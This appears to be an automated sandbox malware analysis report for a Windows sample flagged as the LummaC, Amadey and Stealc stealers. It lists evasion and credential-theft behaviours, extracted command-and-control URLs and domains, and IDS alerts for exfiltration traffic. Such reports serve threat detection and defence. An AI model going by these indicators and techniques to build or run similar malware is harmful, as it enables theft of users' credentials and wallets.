Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540375
MD5: 4aa75791152671db0dd310096a19f866
SHA1: a08bef3a430ae54d94217399bb72e5ece1968498
SHA256: f022c688cbbf7c4f3dc72d820933ccdc24e1b57968afc07d15f6d2609aab8d84
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SIDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000005.00000003.2411955466.0000000004930000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 32.2.7d61336cf8.exe.a20000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: aae25c676b.exe.2528.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "dissapoiznw.store", "mobbipenju.store", "eaglepawnoy.store", "clearancek.site", "studennotediw.store", "bathdoomgaz.store", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50070 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50103 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50128 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50130 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50131 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: BF3BS0M5707K28RGW9.exe, 00000006.00000003.2417253737.0000000005010000.00000004.00001000.00020000.00000000.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2550539027.0000000000A32000.00000040.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9C2A2 FindFirstFileExW, 12_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD68EE FindFirstFileW,FindClose, 12_2_00FD68EE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00FD698F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD076
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD9642
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD979D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose, 12_2_00FD5C97
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00E799D0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E3D110
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E3D110
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_00E3FCA0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 9_2_00E46F91
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 9_2_00E349A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 9_2_00E4D961
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 9_2_00E73920
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E442FC
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then jmp eax 9_2_00E41ACD
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 9_2_00E74A40
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 9_2_00E35A50
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then jmp eax 9_2_00E41A3C
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E43BE2
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 9_2_00E41BEE
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00E79B60
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov ebp, eax 9_2_00E3A300
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E79CE0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 9_2_00E79CE0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 9_2_00E5C470
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00E4D457
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 9_2_00E4B410
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h] 9_2_00E38590
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E46536
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 9_2_00E5FD10
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_00E40EEC
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 9_2_00E36EA0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 9_2_00E3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 9_2_00E46EBF
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 9_2_00E41E93
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 9_2_00E46F91
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E75700
Source: firefox.exe Memory has grown: Private usage: 1MB later: 187MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62888 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:57946 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:58277 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:62514 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:59432 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:54706 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:55373 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50802 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49847 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49848 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:51663 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:59965 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62762 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:58137 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:58587 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49864
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:62596 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55497 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:52894 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49894 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49933 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49926 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49955 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:52776 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:64986 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:64161 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:49662 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:59013 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:53812 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49987 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:60416 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49974 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:56136 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:60918 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50033 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:58560 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:62882 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55538 -> 1.1.1.1:53
